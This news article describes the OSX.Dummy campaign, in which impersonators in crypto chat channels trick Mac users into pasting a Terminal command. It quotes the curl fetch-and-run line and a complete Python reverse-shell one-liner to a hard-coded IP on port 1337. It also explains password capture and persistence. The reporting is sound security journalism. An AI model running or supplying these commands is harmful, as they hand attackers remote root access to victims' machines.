Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it “OSX.Dummy” because, as he wrote:
- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it’s trivial to detect at every step (that dumb)
- … and finally, the malware saves the user’s password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The monster binary carries with it a host of libraries, including Open SSL libraries to encrypt its communications back to the server—a system running in a data center of the hosting provider CrownCloud. Once it executes, it uses the sudo command to make itself owned by macOS’s root user. In order for this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called “dumpdummy”. The script also issues commands to add itself to the startup list for macOS—making itself persistent.
The script’s backdoor code, as Wardle noted, is a recursive Python command-line call with a hard-coded IP address for the connection that uses port 1337—an obvious leetspeak joke.
python -c ‘import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“18.104.22.168”,1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([“/bin/sh”,”-i”]);’
The attacker’s intent is not yet clear. But because all of this executes through a Terminal window, it bypasses MacOS’s GateKeeper malware protection, despite being unsigned code. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.